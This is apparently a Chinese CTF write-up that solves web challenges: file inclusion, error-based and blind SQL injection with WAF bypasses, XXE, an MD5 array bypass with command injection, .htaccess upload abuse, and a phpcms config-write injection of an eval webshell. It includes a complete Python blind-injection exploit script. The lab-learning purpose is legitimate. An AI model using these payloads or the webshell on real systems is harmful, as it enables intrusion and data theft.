ctf回归！！！！😁😁😁😁 先来领点东西！来领Bugfu

file_include

<?php 

$file = $_GET['file'];
if(isset($file)){
	include ($file);
}
else{
	echo '<script>window.location.href="./index.php?file=xiaochou.html"</script

http://1295ae1e-d77e-4cb0-8e84-309c0da0fcdc.ctf.moonback.xyz:8001/index.php?file=pHp://FilTer/convert.base64-encode/resource=flag.php

考点：文件包含漏洞！

ezsql

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
This is a very sql！！！

直接可以报错：

union select order

联合好像不行了！ 报错和盲注应该可以！

直接梭哈
1' AND 9666=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x637466),1,1))>48),SLEEP(5),9666)--

http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id=1' and sleep(5) -- -

ctf

if()

http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id=-2' uniunionon seselectlect 1,2,3  -- -

http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id=-2' uniunionon seselectlect 1,2,3  -- -

http://9046373f-1406-40f5-874f-14c2443a64cb.ctf.moonback.xyz:8001/?id= ' and updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) from information_schema.tables where table_schema like "ctf"),0x7e),1); %23 


emails,fl4g,flag,users~

updatexml(1,concat(0x7e,(seleselectct group_concat(0x23,flag,0x23) from fl4g),0x7e),1);

flag{a27cfdeb-b16c-4ae1-a4f

updatexml(1,concat(0x7e,right((seleselectct group_concat(0x23,flag,0x23) from fl4g),20),0x7e),1); -- -
a4f9-a3d75403648b}
flag{a27cfdeb-b16c-4ae1-a4f9-a3d75403648b}

考点：sql注入！双写绕过waf

后台可能是替换！不是正则！

just_xxe

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "pHp://FilTer/convert.base64-encode/resource=/var/www/html/flag.php" >]>
<info><username>&xxe;</username><password>admin1122</password></info>

考点：XXE + 为协议

ezpass

<?php
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['name']))
{
    $str = $_GET['name'];
    is_numeric($str)?die("no numeber"):NULL;
    if($str==521){
        if (isset($_POST['wsl']) and isset($_POST['pp']))
        {
            if ($_POST['wsl'] === $_POST['pp'])
                echo "wsl can not be pangpang.";
            else if(md5($_POST['wsl']) == md5($_POST['pp']))
                echo(shell_exec( 'cat /flag' ));
            else
                echo "fail!";
        }
    }
    
}
?>

?name=521a
wsl[]=QNKCDZO&pp[]=s878926199a

;a=g;more$IFS$1/fla$a

;echo Y2F0IC9mbGFn |base64  -d |sh 管道符被过滤了！ 不能用这个了！

考点：命令执行

第一次做我以为是！原来题错了！😁

考点： http请求包

file_upload

uplaod uplaod

.htaccess
SetHandler application/x-httpd-php

考点：文件上传+apache 漏洞 MIME绕过

ezezsql

过滤了！
sleep 
union
select 
and 
=

bool注入了！

-1/**/or/**/1#

-1/**/or/**/()#

-1/**/or/*!(Select/**/1)*/#

-1/**/or/**/(select/**/1);#

-1/**/or/**/case/**/when/**/ascii(substr(database()/**/from/**/1/**/for/**/1))>80/**/then/**/1/**/else/**/0/**/end#

dropsec
fl4g,pics
flag
flag{22eb7e17-9d45-4297-ab8e-455e3993dbee}

exp

#然后是二分法，二分法要快很多：
# -*- coding: UTF-8 -*-
import re
import requests
import string
import time
import base64
url = "http://60ef7134-093a-4334-a0b2-5d549e08b4c1.ctf.moonback.xyz:8001/index.php"
flag = ''
def payload(i,j):
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)                                #数据库名字          
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)           #表名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)        #列名
    #sql = "-1/**/or/**/case/**/when/**/ascii(substr(database()/**/from/**/%d/**/for/**/1))>%d/**/then/**/1/**/else/**/0/**/end#"%(i,j)
    
    #sql= "-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)/**/like('dropsec'))/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#" %(i,j)
    
    #sql="-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)/**/like('fl4g'))/**/from/**/%d/**/for/**/1))>/**/(%d)/**/then/**/1/**/else/**/0/**/end/**/#;" %(i,j)
    sql="-1/**/or/**/case/**/when/**/ascii(substr((select(group_concat(flag))from(fl4g))/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#"%(i,j)
    
    #sql="-1/**/or/**/case/**/when/**/ascii(substr(mid((select(group_concat(flag))from(fl4g))/**/from/**/%d/**/for/**/1),2,4))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#"%(i,j)
    #sql="-1/**/or/**/case/**/when/**/ascii(substr(LEFT((select(group_concat(value))from(flag)),10)/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#;"%(i,j)
    #sql="-1/**/or/**/case/**/when/**/ascii(substr(mid((select(group_concat(value))from(flag)),32,45)/**/from/**/%d/**/for/**/1))>/**/('%d')/**/then/**/1/**/else/**/0/**/end/**/#;"%(i,j)

    data = {"id":base64.b64encode(sql.encode('utf-8'))}
    r = requests.get(url,params=data)
    print (r.url)
    if r.status_code == 429:

        print('too fast')

        time.sleep(4)

    if "I will tell you what a real hacker is!" in r.text:
        res = 1
    else:
        res = 0
 
    return res
 
def exp():
    global flag
    for i in range(1,10000) :
        print(i,':')
        low = 31
        high = 127
        while low <= high :
            mid = (low + high) // 2
            res = payload(i,mid)
            if res :
                low = mid + 1
            else :
                high = mid - 1

        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)
 
exp()
print(flag)

考点：sql注入 bool注入

backdoor

/shell.php
cat /*

考点：大马提权

cnf_write

<?php
highlight_file(__FILE__);
error_reporting(0);

function new_addslashes($string) {
     if(!is_array($string)) return addslashes($string);
     foreach($string as $key => $val) $string[$key] = new_addslashes($val);
     return $string;
 }
if(!get_magic_quotes_gpc()) {
    $_POST = new_addslashes($_POST);
    $_GET = new_addslashes($_GET);
    $_REQUEST = new_addslashes($_REQUEST);
    $_COOKIE = new_addslashes($_COOKIE);
}
if(isset($_POST['dosubmit'])) {
    $file = __DIR__ .'/config.php';
    require $file;
    $key = $_POST['info']['name'];
    if(!isset($LANG[$key])) {
        $content = file_get_contents($file);
        $content = substr($content,0,-3);
        $data = $content."\n\$LANG['$key'] = '$_POST[language]';\n?>";
        file_put_contents($file,$data);
    } elseif(isset($LANG[$key]) && $LANG[$key]!=$_POST['language']) {
        $content = file_get_contents($file);
        $content = str_replace($LANG[$key],$_POST['language'],$content);
        file_put_contents($file,$content);
    }
}

这这！！！不会！

phpcms 漏洞复现

不知道怎么利用！

$key = $_POST['info']['name'];
info[name]=111

考点： phpcms 代码漏洞！

<?php
$LANG['member_manage'] = 'admin';
?>

http://127.0.0.1/1.php?reset=1




dosubmit=1
info[name]=member_manage       key = member_manage
language=?><?phpinfo();?>



http://j0k3r.top/2019/10/09/phpcmsv9.6.3_background_rce/#%E7%AC%AC%E4%BA%8C%E6%AC%A1
着篇文章里有！讲解！
原理就是：
但是因为 require 和 file_get_contents 函数读取之后的文件内容不含反斜杠，而我们 POST 传入的 language 会被转义处理得到的值是 string(3) "1\'"

于是判断 $LANG[$key]!=$_POST['language'] 就成立了，接着 str_replace 函数进行字符串替换操作，把原来的 $LANG['1'] = '1\''; 中的 1' 替换成 1\'，最终写入文件

1'
1\'

'
\'

dosubmit=1&info[name]=member_manage&language='?><?php @eval($_POST[upload]);?>


dosubmit=1&info[name]=member_manage&language='a
提交第一次是 '\'a'    
$LANG['member_manage'] = '\'a';
?>
提交第二次是：'\\'a'   发现后面的a'  单独出来了！
$LANG['member_manage'] = '\\'a';

这时候我们'?><?php @eval($_POST[upload]);?> 这样
提交两次!
'?><?php @eval($_POST[upload]);?>

第一次：
$LANG['member_manage'] = '\'?><?php @eval($_POST[upload]);?>';

第二次：
$LANG['member_manage'] = '\\'?><?php @eval($_POST[upload]);?>';
看下图！



dosubmit=1&info[name]=];phpinfo();//1&language=];phpinfo();//1'



$LANG['];phpinfo();//1\'] = '];phpinfo();//1\'';

sql

考点：sql注入